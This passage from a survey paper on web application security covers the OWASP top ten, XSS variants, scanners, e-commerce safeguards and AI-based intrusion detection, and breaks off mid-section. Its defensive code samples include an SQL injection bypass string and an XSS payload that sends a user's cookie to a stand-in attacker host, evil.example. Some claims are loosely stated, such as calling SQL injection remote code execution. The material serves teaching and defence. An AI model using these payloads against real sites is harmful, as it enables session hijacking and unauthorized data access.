Abstract
Web applications play a vital role in the modern digital world. Their pervasiveness is underpinned by numerous technological advances that can often lead to misconfigurations, opening the way for a variety of attack vectors. With the rapid development of E-commerce, big data, cloud computing, and other technologies, more enterprise services are moving onto the internet and have increasingly become key targets of network attacks. Appropriate remedies are therefore essential to maintain the very fabric of security in the digital world. This paper aims to identify the vulnerabilities that must be addressed to ensure web security. We identify and compare the static, dynamic, and hybrid tools that can counter the prevalent attacks perpetrated through the identified vulnerabilities. Additionally, we review the applications of AI in intrusion detection and pinpoint the research gaps. Finally, we cross-compare the various security models and highlight relevant future research directions.
Introduction
Web applications are becoming ubiquitous in the modern digital world and play a vital role in the widespread use of E-commerce [169]. The recent COVID pandemic further highlighted their importance, as government, semi-government, and private establishments aim to provide seamless online services to customers. However, their prevalent usage makes them an attractive target for malicious attackers, who typically aim to leverage the underlying vulnerabilities and misconfigurations in these applications [86]. According to a recent security review by the Application Defense Center, more than 85 percent of web applications are vulnerable to cyber-attacks [6,26,67,119]. In view of this, we begin by presenting a discussion of the top ten vulnerabilities identified by the Open Web Application Security Project (OWASP). Subsequently, we highlight the main tools for scanning web vulnerabilities, i.e., OWASP tools, Web Application Protection (WAP), and RIPS [163].
OWASP serves as a core foundation for handling security issues and is therefore widely used in web security. The authors in [163] utilize two open-source tools for scanning web vulnerabilities: WAP and RIPS. In addition to these tools, we also identify various other approaches that can improve scanning accuracy, including static and dynamic code analysis [103,142], Machine Learning (ML) based approaches, and penetration testing tools [179]. We also compare static and dynamic analysis techniques, which are fast and promising for detecting vulnerabilities and can work effectively alongside penetration testing tools. The use of various testing methodologies is critical to uncover software faults early in the development process and to prevent unauthorized access. The authors of [20] conduct test automation specifically for web applications by introducing planning models for attacks and applying them to online application testing. Users must understand how to protect their websites from attacks, and how to handle the credentials they use across multiple websites. The top ten practices that every website developer and owner should adopt include regular updates, strong passwords, and several other techniques that can secure a website against different types of attacks [107]. E-commerce security is another essential aspect of web application security, and this article discusses it in light of growing attacks and security issues: the worldwide popularity of websites is driving an increase in electronic business and online transactions.
This paper addresses the wide-ranging vulnerabilities, web security concerns, and their impacts on E-commerce. It also provides a survey of vulnerabilities, comparing tools, threats, and several ways to secure the web and avoid vulnerabilities. In recent decades, ML and Deep Learning (DL) have shown significant progress in web security; we therefore discuss several approaches based on ML and DL. Further, we discuss several open problems whose resolution can lead to more secure and vulnerability-free systems.
The rest of the paper is organized as follows: Section 2 describes the basic theory behind advanced web security and vulnerabilities. Section 3 covers the types of security vulnerabilities. Sections 4, 5, and 6 cover attack impacts, a comparison of tools, and security threats, respectively. Section 7 thoroughly studies E-commerce security in terms of its purpose, issues, tools, and secure techniques. Section 8 discusses several ways to secure the web and state-of-the-art methods based on ML and DL. Sections 9 and 10 discuss the overall issues and conclude the paper.
Theory of web security and vulnerabilities
Network Security Situation Awareness (NSSA) refers to acquiring and understanding network security elements, assessing the current network security situation, and predicting future network security trends [24]. In recent years, the Internet has developed rapidly, and more and more new concepts have been put forward, including the "Internet of Things (IoT)", "big data", and "cloud computing". Many researchers have strengthened cybersecurity research and made significant developments [69,78,91,93], covering critical national information infrastructure networks, spatial information infrastructure, military information infrastructure, smart cities, the IoT, autonomous driving, etc. Attacks on web applications began in the mid-1990s, almost immediately after the inception of the World Wide Web, and web application issues have since become the most common factor in enterprise security breaches [75]. The web application is an essential technology because of its versatility in providing social services, and it has rapidly grown into one of the most widely used technologies [169]. Web applications have become a popular target for internet attackers because of their growing popularity and complexity. Even with the assistance of security experts, they remain challenging to manage due to the complexity of penetration testing and code review procedures; many testing methods are required in code review and penetration testing, and websites are hacked daily [8].
Users' accounts and other information are now susceptible to fraud and many other risks as more customer data is transferred online through digital purchases or remittance activities [132]. Web services that handle payments online are more likely to be attacked than other websites, and if data is lost or altered, the consequences are more severe. The fear of credit card numbers or other sensitive information being stolen is a primary factor that makes such websites less attractive [150]. Consumers are also concerned about web security attacks, which has led to a lack of trust in the industry. The number of articles published since 2012 with the title "web security" or "vulnerabilities", according to Google Scholar metrics, is shown in Fig. 1. Given its importance in the current era of multimedia, web security needs to be explored further to provide valuable solutions to current limitations.

Published articles since 2012 with the title web security / vulnerabilities.
As a consequence, numerous business owners, as well as internet users, are reluctant to adopt this new technology. Privacy and security are critical factors: the commercial sector pays close attention to them because they can determine whether a business succeeds or fails [162]. According to the Web Application Security Consortium (WASC) report, nearly 49% of websites carry threats and risks with a high severity level, and 13% of websites can be compromised automatically [23].
Figure 2 demonstrates a website's basic logic: an internet application with a client interface and a server end hosted on a web server, accessible via a Uniform Resource Locator (URL). The browser (client) and the server communicate over TCP, the transport protocol. This is the basic architecture of data flow in a web application: HTTP is the transfer protocol, CSS is the presentation format, and HTML is the hypertext markup language. The user clicks or enters a URL, and the client sends an HTTP request via the communication protocol. The server returns an HTML output page (i.e., a web page), which the client's browser displays as a site [10].

Architecture of the website.
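For illustration, the following minimal Python sketch traces the request/response cycle of Fig. 2 using only the standard library; example.com is a placeholder host, and the snippet stands in for what a browser does when a URL is entered.

```python
# Minimal illustration of the client-server flow in Fig. 2: the client
# sends an HTTP GET request for a URL over TCP, and the server returns
# an HTML page that a browser would render.
from urllib.request import urlopen

with urlopen("http://example.com/") as response:    # HTTP request over TCP
    html = response.read().decode("utf-8")           # HTML returned by the server
    print(response.status, response.headers["Content-Type"])
    print(html[:200])                                # beginning of the page
```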
Web security and cyber security are closely related but distinct fields. Both are concerned with protecting computer systems and networks from unauthorized access, but they have different focuses and approaches [42,137]. Web security is specifically focused on protecting web applications and the data that they handle. This includes preventing SQL injection attacks, cross-site scripting (XSS) attacks, cross-site request forgery (CSRF) attacks, and other types of attacks that target web applications. Web security also includes protecting against malware that is distributed through the web and safeguarding against phishing and other types of social engineering attacks.
Cyber security, on the other hand, is a broader field that encompasses web security as well as other types of security concerns. It involves protecting all types of computer systems and networks from unauthorized access, including not only web applications but also desktop software, mobile devices, and IoT devices [80]. Cyber security also includes protecting against advanced persistent threats (APTs), nation-state cyber-attacks, and other types of sophisticated cyber-attacks [9]. One key difference between web security and cyber security is that web security is mainly focused on protecting the client-side of the application while cyber security is focused on protecting the whole infrastructure. Another key difference is that web security is mainly focused on protecting against known vulnerabilities and attacks, while cyber security is also concerned with identifying and mitigating unknown threats. Cyber security also includes incident response and disaster recovery planning, as well as compliance with regulations such as HIPAA, PCI-DSS and others.
Web security and cyber security also use different tools and techniques. Web security tools include web application firewalls (WAFs), intrusion detection and prevention systems (IDPSs), and web vulnerability scanners. Cyber security tools include firewalls, intrusion detection and prevention systems (IDPSs), antivirus software, and network security monitoring (NSM) tools.
Artificial intelligence and web security
Artificial intelligence (AI) plays a critical role in web security, helping to protect against a wide range of cyber threats [106,128]. One of the key ways in which AI is used in web security is through the development of sophisticated algorithms that can detect and respond to suspicious activity on a network [71]. These algorithms are able to analyze large amounts of data in real-time, looking for patterns that indicate a potential threat. They can also learn from past incidents, becoming more effective over time at identifying new and emerging threats. One example of how AI is used in web security is through the development of intrusion detection systems (IDS) [180]. These systems use machine learning algorithms to analyze network traffic and identify suspicious activity, such as attempts to exploit vulnerabilities or access sensitive data. They can also be configured to respond to threats in real-time, blocking malicious traffic or isolating affected systems to prevent further damage.
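As a concrete illustration of the anomaly-detection idea behind such IDS approaches, the following minimal sketch trains an unsupervised model on synthetic network-flow features; the feature values are invented for illustration, and scikit-learn is assumed to be available.

```python
# A minimal sketch of ML-based anomaly detection on network-flow
# features (packets, bytes, duration): the model learns the shape of
# normal traffic and flags flows that deviate from it.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
# synthetic "normal" flows: ~100 packets, ~50 KB, ~2 s per flow
normal_flows = rng.normal(loc=[100, 5e4, 2.0],
                          scale=[10, 5e3, 0.5], size=(500, 3))
model = IsolationForest(contamination=0.01, random_state=0).fit(normal_flows)

suspicious = np.array([[900, 9e5, 0.1]])   # a flood-like burst of traffic
print(model.predict(suspicious))           # -1 flags the flow as anomalous
```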
Another way in which AI is used in web security is through the development of advanced antivirus software [109]. These programs use machine learning algorithms to identify malware and other malicious software based on their characteristics and behavior. They can also be configured to update their databases with new malware signatures in real-time, ensuring that they are always able to detect the latest threats. AI is also used in web security through the development of behavior-based detection systems. These systems analyze the behavior of users and devices on a network, looking for patterns that indicate suspicious activity. For example, a system might flag an account that has been accessed from multiple locations in a short period of time, indicating a potential account takeover.
In addition to these specific applications, AI is also used more broadly in web security through the development of automated incident response systems. These systems use machine learning algorithms to analyze large amounts of data from a variety of sources, such as network logs and security cameras, to identify potential threats. They can also be configured to respond to incidents in real-time, triggering security measures such as isolating affected systems or escalating the incident to human security teams for further investigation. AI is also used in web security to identify and protect against Advanced Persistent Threats (APT) [9]. These are cyber-attacks that are typically carried out by nation-states or other highly-skilled adversaries. They are typically characterized by prolonged and stealthy access to a target network, during which the attacker seeks to gain access to sensitive data or disrupt operations. AI-based security solutions can help detect APT by analyzing network traffic and identifying patterns of behavior that indicate an APT is in progress. They can also be configured to respond to APT in real-time, taking actions such as isolating affected systems or escalating the incident to human security teams for further investigation. Another way AI is used in web security is through the development of threat intelligence platforms. These platforms use machine learning algorithms to analyze data from a variety of sources, such as social media, dark web forums, and other open-source intelligence. They help to identify potential threats and provide actionable intelligence that can be used to protect against them.
Types of security vulnerabilities
A vulnerability is defined as a set of circumstances that leads, or may lead, to an implicit or explicit failure of an information system's confidentiality, integrity, or availability [75]. According to the report, nearly nine out of ten vulnerabilities are introduced during the development phase because known vulnerabilities in other information systems are ignored [102]. The ten most commonly exploited vulnerabilities are responsible for roughly three-quarters of violations in today's software applications. The OWASP Top Ten project emphasizes identifying the most severe threats to a wide range of users; in other words, if developers are aware of these ten vulnerabilities, a large number of attacks can be avoided. These flaws can be complicated and appear under a variety of circumstances. Using a web application firewall may minimize the effect of some activities, but it does not address the underlying vulnerabilities [44]. We highlight a few common attacks on web applications, such as Cross-Site Scripting (XSS), browser attacks, and cookie/session hijacking [76]. SQL injection and XSS are the security issues most commonly encountered in web applications [19,35,99,122]. We discuss the OWASP top ten vulnerabilities below; they are shown in Fig. 3.

Top ten vulnerabilities.
Injection
SQL injection is a remote code execution technique that allows attackers to obtain critical data from the web server's database. The attack succeeds because user inputs are not properly validated before being passed to SQL queries, so an attacker can easily manipulate query results by combining SQL keywords with user inputs [154]. SQL injection usually happens when user input is included in a command sent to the interpreter; the attacker forces the interpreter to run these queries to gain access to a user's sensitive information without their awareness [126]. SQL injection can cause authentication bypass, data loss, denial of access, destruction of the entire database, or host takeover.
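For illustration, the following minimal Python sketch (using the built-in sqlite3 module; the table and values are synthetic) contrasts a vulnerable string-concatenated query with the standard parameterized remedy.

```python
# Concatenating user input into a query lets an attacker inject SQL
# keywords; a parameterized query sends the input as data, not command.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"                     # classic injection payload

# VULNERABLE: the payload becomes part of the SQL command
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()
print(rows)    # returns every row -- authentication bypass

# SAFE: the driver binds the input as a literal value
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)    # returns nothing: no user has that literal name
```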
Broken authentication and session management
Another widespread shortcoming in the OWASP list is broken authentication and session management, which arises from flaws in the implementation of session management in web applications. This vulnerability allows attackers to steal keys, passwords, credit card numbers, and session IDs due to improper implementation of authentication and session-management functions. The attack can be caused by misconfiguration, such as storing passwords in plain text or storing users' credentials with weak encryption. According to OWASP, these attacks can also be caused by ineffective password management, logout mechanisms, "forgot password" features, and other similar functionality [155,157]. Developers are the ones who must implement strong authentication and session management controls [55].
Cross-site scripting
XSS is considered one of the critical threats to the security of web applications. XSS attacks are caused by improper validation and sanitization of user-provided inputs. Such an attack allows attackers to run malicious scripts in the browser to steal cookies and hijack user sessions [43,45]. Session hijacking, sensitive information disclosure, perimeter defense bypassing, and site trust abuse are possible outcomes of XSS. These scripts can also change the content of a page by rewriting its HTML.
The following are the steps that hackers take in this attack [144]; a defensive escaping sketch follows the list:
Identify vulnerable websites and issue the necessary cookies.
Create malicious code and test it to ensure it works as expected.
Craft malicious URLs; the code can also be embedded in web pages and e-mails.
Encourage users to run the malicious code, which will result in the account being hijacked or collecting sensitive data.
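Against the steps above, the standard first defense is to HTML-escape user input before it is echoed into a page. The following minimal Python sketch (standard library only; the payload is illustrative) shows the difference.

```python
# HTML-escaping user input neutralizes injected <script> tags before
# they reach the victim's browser.
import html

user_input = ('<script>document.location='
              '"http://evil.example/?c="+document.cookie</script>')

# VULNERABLE: raw input reflected into the page executes in the browser
page = "<p>Hello " + user_input + "</p>"

# SAFE: escaped input is rendered as inert text
safe_page = "<p>Hello " + html.escape(user_input) + "</p>"
print(safe_page)   # <p>Hello &lt;script&gt;...&lt;/script&gt;</p>
```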
XSS attacks are classified into four types:
Stored (persistent)
Reflected (non-persistent)
Induced XSS
DOM-based XSS
The first two are still the most popular XSS attacks, while the remaining two are less well-known.
Stored XSS
This vulnerability is triggered when the injected malicious code is stored persistently on the victim's servers. First, the attacker finds a weakness in the software system and injects malicious code; the attacker then grabs the user's personal information, which may lead to serious damage [94]. The attack is triggered when a client retrieves the stored information through the web application, giving the attacker access to it. According to [166], stored XSS is more dangerous than the other types.
Reflected XSS
Reflected XSS attacks differ from stored XSS attacks. They target web application features that echo back data provided by the client, such as forms. Because the injected code is not stored on the server, the attacker crafts a link containing malicious script code, leading the victim to believe the link is genuinely legitimate [167]. When the user visits the web page by clicking on the provided link, the injected script is reflected by the server and executes in the victim's browser.
DOM-based XSS
This attack is launched on the client side, similar to reflected XSS. The significant difference is that the attack code is not embedded in the HTML content sent back by the server; as a result, all server-side detection mechanisms (e.g., those based on session cookies or form fields) fail. The vulnerability is triggered when active content (e.g., a JavaScript function) is manipulated by a crafted request, letting an attacker control a DOM element [94,134,166,167].
Induced XSS
Induced XSS exploits a web server vulnerability known as HTTP response splitting [134]. An attacker can use this vulnerability to modify the web page by manipulating the server's response headers, which can be accomplished by injecting an invalid request parameter into the HTTP response headers [73]. XSS is a commonly exploited security weakness in modern websites [141]. Stored and reflected vulnerabilities can be found in both server- and client-side code, whereas DOM-based XSS is only detected on the client side [94]. Detecting XSS vulnerabilities has received a lot of attention; however, researchers are still trying to develop a reliable and appropriate method for analyzing source code and detecting XSS vulnerabilities in web applications [143,161].
Insecure direct object references
This vulnerability generally arises when internal implementation objects, such as database keys or files, are exposed. In the absence of a protection mechanism, an attacker can manipulate these references to steal data [44]. For example, consider the case where a repository or login-information file that should only be accessible to network administrators is made available to other users on the network. Without an access control check, unauthorized access to these resources can often be attained by manipulating URL parameters [65].
Security misconfiguration
A well-defined security configuration is required for web applications and their corresponding web servers. In most cases, the default security configurations are insecure, for example default passwords, default accounts, and enabled directory listings. Furthermore, security mechanisms should be kept up to date. According to OWASP, security misconfigurations can enable external and internal attacks, resulting in unauthorized access or system compromise [10,36].
Sensitive data exposure
Passwords and cookies exchanged between the browser and the server require extra security because they are sensitive to the user [87]. Sensitive information is sometimes left unprotected in web applications; attackers can easily steal or change this information and utilize it to gain access or conduct unauthorized transactions. The use of insecure encryption schemes can also expose sensitive information. An attacker can further use sensitive information to manipulate a web application or discover other exploitable vulnerabilities [44,48].
Missing access level control
This mostly occurs when users can access restricted resources or private data without being properly authenticated. If a web application cannot control resource access, attackers can easily use restricted resources and modify data on the server, seriously damaging data integrity. Security controls should be in place to ensure that a user is authenticated and has the appropriate access rights, especially for web applications with multiple users in different roles [1,23].
Cross-site request forgery (CSRF)
CSRF is a distinctive attack that deceives a victim into performing malicious actions on a website where he/she is currently an authenticated, legitimate user. In contrast to XSS, CSRF takes advantage of a site's trust in a browser: because that trust exists, the website is compelled to carry out the requests. Malicious users craft forged HTTP requests and trick victims into transmitting them using various techniques [44,98].
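A common countermeasure is the synchronizer-token pattern. The following minimal Python sketch (session storage is a plain dict here, purely for illustration) shows the idea: a forged cross-site request cannot guess the per-session token.

```python
# The server issues a random per-session token, embeds it in its own
# forms, and rejects any state-changing request whose token mismatches.
import secrets
import hmac

sessions = {}                                 # session_id -> csrf_token

def issue_token(session_id: str) -> str:
    token = secrets.token_urlsafe(32)         # unpredictable random token
    sessions[session_id] = token
    return token                              # embedded in a hidden form field

def verify_token(session_id: str, submitted: str) -> bool:
    expected = sessions.get(session_id, "")
    return hmac.compare_digest(expected, submitted)  # constant-time compare

sid = "abc123"
form_token = issue_token(sid)
print(verify_token(sid, form_token))   # True  -- legitimate form submission
print(verify_token(sid, "guessed"))    # False -- forged cross-site request
```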
Components with known vulnerabilities
Web applications use a variety of components, such as modules, libraries, and a wide range of supporting frameworks, which run with full privileges. If an attacker successfully exploits a vulnerable component, sensitive data can be lost. Integrating components with known vulnerabilities into a web application can enable a broader range of attacks by weakening the application's defensive measures [44].
Unvalidated redirects and forwards
Attackers can utilize this weakness to redirect victims to malicious websites because user data is often not properly validated. Forwards can also be used to gain access to restricted pages. Due to insufficient validation mechanisms, attackers can redirect web requests to phishing or other malicious websites, which may affect data confidentiality [10,44,102].
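A minimal sketch of the usual remedy, validating redirect targets against an allow-list of hosts, follows; trusted.example is a placeholder for the site's own domains.

```python
# Only redirect to relative (on-site) URLs or allow-listed hosts,
# preventing the open-redirect abuse described above.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"trusted.example", "shop.trusted.example"}

def safe_redirect_target(url: str) -> bool:
    host = urlparse(url).netloc.split(":")[0].lower()
    # relative URLs (empty host) stay on-site; others must be allow-listed
    return host == "" or host in ALLOWED_HOSTS

print(safe_redirect_target("/account"))                     # True
print(safe_redirect_target("https://phish.example/login"))  # False
```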
Attack impacts (low, medium, high)
The impact of a threat is determined by the methods, targets, mediums, and magnitude used in carrying out the attack. As a result, attack implications must be analyzed to identify the risk level of the threats discussed in this paper; this makes it relatively simple to prioritize protective mechanisms against the risk factors. We categorize attack impact into three risk levels: high, medium, and low, classifying every threat consequence using the OWASP risk rating methodology. This approach considers two kinds of impact: commercial and technical. Technical impacts can be measured using information security attributes such as confidentiality, integrity, and availability, whereas commercial impacts vary with the state of each organization. Due to this limitation, we evaluate the technical consequences of malicious activities. The percentage of attacks per risk level relates to Transport Layer Security (TLS) and websites: twenty-six different cyber-attacks are specified, of which ten are high-risk, eleven medium-risk, and fifteen low-risk [169].
High level
This level relates to attacks that cause significant damage to confidentiality, integrity, or availability. TLS attacks are the major source of concern in terms of confidentiality, while session management is the primary concern for authentication failure. On this basis, the attacks on web applications can be divided into two types: Man-In-the-Middle (MITM) and Browser Cache Poisoning (BCP). MITM and BCP are closely related techniques that increase the risk of client-server authentication breakdown. Using such an attack, the attacker can completely impersonate an entity or subvert the source's legitimacy, eventually resulting in a loss of security and privacy. In terms of integrity, MITM and BCP violate both information and connection integrity: an attacker can modify any message without leaving any trace on the client or server side.
Medium level
Other security weaknesses belong to the medium level. A developer's failure to employ robust encryption mechanisms puts the user at risk; session mechanisms often support only partially enforced encryption, although a potential attacker would still struggle to defeat such a mixed mechanism. These criteria also include poor cookie implementation, which results in cookie misconfiguration; even if an attacker successfully bypasses the Secure and HttpOnly flag mechanisms, stealing the cookie remains difficult. Attacks at this level also put users' Personally Identifiable Information (PII) at risk by exposing browsing history, such as e-mail information, adversely affecting data confidentiality.
Low level
This category includes attacks that directly affect data usage, cause data loss, or modify user data due to weak authentication or missing security headers such as HTTP Strict-Transport-Security (HSTS), Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP). Poor implementation of HSTS and CSP has little impact on confidentiality, apart from the MITM case already discussed under the high-level category. If HPKP is not configured correctly, an attacker can attack the system's authenticity or integrity.
Comparison between static, dynamic, and hybrid tools
Dynamic analysis cannot obtain optimal code coverage, whereas static analysis can. Several research efforts have combined the two methodologies to reduce their drawbacks and enhance their benefits [183]. Static analysis is a set of approaches for predicting an application's dynamic behavior before execution. Its critical advantage is that it does not require the application's deployment and execution; ideally, static analysis produces no false negatives. Dynamic analysis, on the other hand, runs a set of tests during code execution to detect vulnerabilities and prevent attacks. False positives are reduced because the tests are performed on "live" websites; however, the approach is vulnerable to false negatives [30].
These tools can be compared by installing deliberately vulnerable applications written in various programming languages, containing flaws such as SQL injection, directory traversal, XSS, and command injection. The vulnerable applications were analyzed using dynamic tools such as AppSpider and Burp Suite Pro on a Windows workstation; the applications themselves were deployed on a Windows system running Java (i.e., Tomcat) and on a Linux server with a PHP interpreter. After the scanning process completes, the result is a report with full details, such as where each vulnerability was discovered and the time taken to scan the program. The scanners are then compared based on these reports.
In the static approach, the static scanners can be installed directly on a local machine or Linux system to scan the vulnerable application manually while recording the time taken. After the analysis completes, each tool provides a detailed report of the results, and the outcomes can be explored based on this information. Some static scanners, such as SonarCloud, are accessed via the internet; after scanning, the scanner generates a report with the required information. FindBugs is an IDE plug-in that detects vulnerable applications and raises a notification if the code contains a vulnerability; the plug-in's completion time can be recorded for comparison. The hybrid method combines dynamic and static approaches to control the vulnerabilities mentioned above; however, hybrid tools also inherit the drawbacks of both and are often inefficient in practice [174]. The significant increase in vulnerabilities shows that present code evaluation and software quality assurance approaches must be enhanced in capability and reliability [164].
Security threats
Web services have introduced new forms of threats and attacks. Security risks can be divided into the following categories:
Denial of Service
Unauthorized Access
Identity Spoofing
Security (Theft and Fraud)
Denial of services
Website technologies are well equipped to detect standard denial-of-service activity. This attack stops a system or infrastructure from working correctly and is usually performed by sending multiple requests to the application; if the application receives more requests than it can manage, it hangs, and the user is unable to use the service [16]. A distributed denial of service (DDoS) attack is one in which many computers are employed to cause the denial of service [155]. DoS attacks are classified into spamming and viruses [116].
Unauthorized access
It refers to unauthorized access to systems, applications, or data. When designing and implementing a web application, we must ensure that no information is accessible to unauthorized users. We should use strong authentication and authorization to authenticate and authorize service customers. We can mitigate this threat by preventing sensitive information from passing through SOAP headers and by using strong encryption techniques to protect the communication channel [150].
Data alteration and message replay
Data alteration refers to the unauthorized modification of data in transit, while a message replay attack captures a legitimate message and re-sends it to the service.
Identity spoofing
The technique of fooling someone is known as spoofing. It is a popular method of attacking a system through user credentials: the illegal use of a user's credentials via web services is identity spoofing.
Security (theft and fraud)
We already discussed data theft under unauthorized access. Fraud occurs when someone uses stolen or modified data for malicious ends. Theft also includes unauthorized copying of software from a company's servers and theft of hardware such as laptops.
E-commerce security
Digital E-commerce cycle
A high level of security is required for shopping and E-commerce websites. Many products are now ordered online because websites offer a very convenient and straightforward way to purchase goods, from clothing to automobiles; popular sites include Amazon, eBay, Best Buy, and many others [13]. The Internet has suffered various network attacks, threatening everyone's network information security; without due attention, such attacks can bring severe economic losses and even affect the network security of a whole country. For example, Ctrip, a well-known tourism website in China, suffered an unknown network attack in 2015 that took the company's servers offline for up to 12 hours. The United States encountered one of the most significant DDoS attacks in history, involving companies including Google, Facebook, Twitter, and other well-known enterprises, which directly led to the "disconnection" of half of the country. In 2019, the Amazon AWS DNS service (i.e., Route 53) was hit by a distributed denial of service (DDoS) attack: the attacker sent a large amount of useless data to the servers, resulting in slow responses and even downtime. By sending large amounts of meaningless data, an attacker can abuse the TSIG configuration, causing the BIND domain name resolution server to crash.
Many companies are taking advantage of E-commerce opportunities; high efficiency, low cost, and greater profitability are the main reasons for businesses' attention. Still, security issues in E-commerce are a significant cause of loss and make websites less attractive [22]. Several key aspects of E-commerce security need to be analyzed, such as computer security, data security, and network security. Because of its unique structure, one of the most apparent security components can impact the end-user through everyday payment interactions with a business [116]. Data loss is a crucial concern for E-commerce websites because E-commerce deals with online shopping and payments by debit card, credit card, and PayPal, increasing the websites' risk. Web mining technologies can also be used to improve the security of E-commerce websites: the relationship between web data extraction, privacy, and E-commerce is observed through online user behavior, and E-commerce websites are secured using a variety of web mining techniques and security algorithms [3,90,96,118].
A risk assessment model has been designed using the Fuzzy Inference System (FIS). The model generates risk assessment results based on four risk factors: vulnerability, threat, possibility, and influence; the feasibility of the model was verified [5]. Hu et al. established a quantitative security risk assessment model that predicts the threat to network security based on a dynamic Bayesian attack graph and then performs a quantitative assessment of security risk based on the threat prediction [54]. An evaluation index system was proposed for enterprise cloud accounting risk evaluation, which divided the risk evaluation into internal and external service factors, subdivided into a standard layer and an index layer [32]. Han et al. address the security problems of the cloud IoT with a three-layer index system based on Software Defined Networking (SDN): the assessment is divided into non-overlapping perception, SDN, and cloud application layers according to the cloud IoT architecture [47]. Some researchers have also established evaluation index systems from the perspective of specific network attacks: to quantify the attack effect of an Advanced Persistent Threat (APT) and to visualize APT capability, the authors built an index system based on APT's persistence, concealment, diffusion, and intractability characteristics [85]. The entire digital E-commerce cycle is shown in Fig. 4.

E-commerce cycle.
Data confidentiality
It involves securing valuable data from unauthorized access by third parties, as shown in Fig. 5; this is essentially provided through encryption and decryption [13].

Confidentiality.
Authentication
Digital signatures are utilized to authenticate the identity of the person who wants to use the service; basic authentication is shown in Fig. 6. In other words, authentication means verifying the sender's identity. A message authentication code (MAC) is one of the most common algorithms used to authenticate a message [72].

Authentication.
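A minimal Python sketch of MAC-based authentication follows; the key and message are placeholders, and in practice the key must be exchanged over a secure channel.

```python
# The sender attaches an HMAC tag computed from the message and a
# shared secret key; the receiver recomputes and compares the tag to
# verify the sender's identity and the message's integrity.
import hmac
import hashlib

key = b"shared-secret-key"         # placeholder secret
message = b"transfer 100 to account 42"

tag = hmac.new(key, message, hashlib.sha256).hexdigest()  # sent with message

def verify(key: bytes, message: bytes, tag: str) -> bool:
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

print(verify(key, message, tag))                        # True
print(verify(key, b"transfer 100 to account 66", tag))  # False (tampered)
```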
Authorization
Authorization controls the features a user is allowed to access; valid credentials are required [123].
Data integrity
It ensures that the data has not been altered, which is achieved through the use of a message digest or hashing. Integrity is a method of maintaining the data's trustworthiness, consistency, and accuracy throughout its life cycle, as shown in Fig. 7. It also refers to the process of protecting data from unauthorized modification, which can be done in a network by implementing a hashing algorithm such as the Secure Hashing Algorithm (SHA) [34].

Integrity.
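Following Fig. 7, a minimal Python sketch of digest-based integrity checking is given below; the payloads are invented for illustration.

```python
# Any modification of the data changes its SHA-256 hash, so comparing
# digests detects tampering.
import hashlib

original = b"order: 3 items, total $59.99"
digest = hashlib.sha256(original).hexdigest()   # stored or sent with the data

received = b"order: 3 items, total $0.99"       # altered in transit
print(hashlib.sha256(received).hexdigest() == digest)  # False -- tampering detected
```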
Non-repudiation
Non-repudiation means that a party cannot deny a sale or purchase that was made using a digital signature, as shown in Fig. 8. In other words, it is a service that can prove the integrity and origin of the data [177].

Non-repudiation.
Encryption and decryption
Plaintext/Cleartext – a message readable by humans.
Ciphertext – an unreadable form of the message, produced by encryption and recovered by decryption.
The whole encryption-decryption process is shown in Fig. 9. A cipher is a cryptographic process, a mathematical operation. Typically, most attacks aim to locate the keys, and a successful key recovery can be catastrophic.

Encryption and decryption process.
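A minimal sketch of the encryption/decryption cycle in Fig. 9 follows, assuming the third-party `cryptography` package is installed; Fernet provides authenticated symmetric encryption, so the key is exactly what an attacker would need to recover the plaintext.

```python
# Symmetric encryption and decryption with a single secret key.
from cryptography.fernet import Fernet

key = Fernet.generate_key()         # the secret most attacks try to obtain
cipher = Fernet(key)

plaintext = b"card number: 4111 1111 1111 1111"
ciphertext = cipher.encrypt(plaintext)   # unreadable without the key
print(cipher.decrypt(ciphertext))        # original plaintext is recovered
```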
The security of E-commerce assets against illegal access, use, alteration, or destruction is known as E-commerce security. While security features cannot guarantee a secure system, they are necessary for its progress. The following security measures should be considered for robust E-commerce security.
E-commerce security tools
Our computers become vulnerable to cyber-attack when we link them to a network. A firewall protects a computer by restricting the traffic that the computer sends and receives [152]. Some essential security tools are listed below:
Public Key Infrastructure (PKI)
Encryption software – encryption is the transformation of essential data into a form that can only be read with the help of a decoding key
Digital certificates (certificates of authenticity)
Digital signatures
Biometrics – eye scanners, fingerprints, etc.
Passwords
Bars and locks – physical security for the network operations center
Secure protocols
Data mining techniques to secure E-commerce website
We can secure an E-commerce website using web mining techniques and can evaluate the relationship between web mining and security based on user behavior. Web mining belongs to data mining; it automatically searches and collects information across web documents. Web mining serves as a news service center that provides information, E-commerce data, financial management, and other services, and web mining frameworks can be used to evaluate E-commerce websites. In general, web mining can be classified as follows:
Web Structure Mining
Web Content Mining
PageRank and TrustRank are the most popular algorithms in web mining.
Web structure mining
At this stage, we examine a website using both algorithms. A page's rank is determined by its link structure rather than its content, while TrustRank is an algorithm for evaluating website quality: the outcome is a quality-based score that demonstrates the website's level of trustworthiness. The first step is to collect information from websites and store it in a web storage system [96].
Search engines utilize the PageRank algorithm. We can determine a website's PageRank by decoding web pages for specific links, computing the PageRank incrementally, and sorting the documents using a page-search ranking engine.
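For illustration, a minimal power-iteration sketch of the PageRank computation follows; the three-page link graph is synthetic.

```python
# A page's score derives from the link structure: each page distributes
# its score across its outgoing links, damped by factor d.
import numpy as np

# toy web: page i links to the pages in links[i]
links = {0: [1, 2], 1: [2], 2: [0]}
n, d = 3, 0.85                      # number of pages and damping factor

rank = np.full(n, 1.0 / n)
for _ in range(50):                 # iterate until scores stabilize
    new = np.full(n, (1 - d) / n)
    for page, outs in links.items():
        for target in outs:
            new[target] += d * rank[page] / len(outs)
    rank = new
print(rank)                         # page 2, with two in-links, ranks highest
```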
The TrustRank algorithm determines the quality of websites by generating a page-quality measurement based on the linking structure. The TrustRank procedure is given below:
The selection of trustworthy web pages is the starting point.
Trust is transferred by linking to other pages and spreads in the same way that PageRank does.
The negative form of the measure propagates in reverse, indicating flawed pages.
The ranking algorithm can consider both measures.
Web content mining
Finding new information from a website is called web content mining; the user obtains information on any topic of his/her choice. Web content mining approaches can be classified into hierarchical clustering and K-means clustering.
Hierarchical clustering
